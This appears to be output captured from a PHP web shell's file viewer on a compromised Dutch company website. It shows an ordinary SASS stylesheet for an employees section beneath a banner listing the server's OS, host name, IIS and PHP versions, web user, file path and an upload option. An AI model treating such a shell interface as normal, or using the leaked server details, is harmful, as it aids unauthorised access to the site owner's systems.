HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/SBogers60/vandeurzenheftrucks.nl/wwwroot/css/pages/_about.sass
.employees
  +flex(flex-start, flex-start)
  +flex-rows()

.employees-list
  width: 25% !important

  +respond-to-width(1020)
    width: 50% !important

.employees-info
  color: white
  text-align: center
  background-color: #0D57C1
  width: 25% !important

  &.yellow-variant
    color: #0D57C1
    background: #FEDD33

    h2
      color: #0043C4

    a
      color: #0043C4
      transition: color 0.4s ease

      &:hover
        color: #0D57C1

  +respond-to-width(1020)
    width: 50% !important

  +flex(center, center)
  +flex-direction(column)

  h2
    color: white

  a
    color: #FEDD33
    transition: color 0.4s ease

    &:hover
      color: white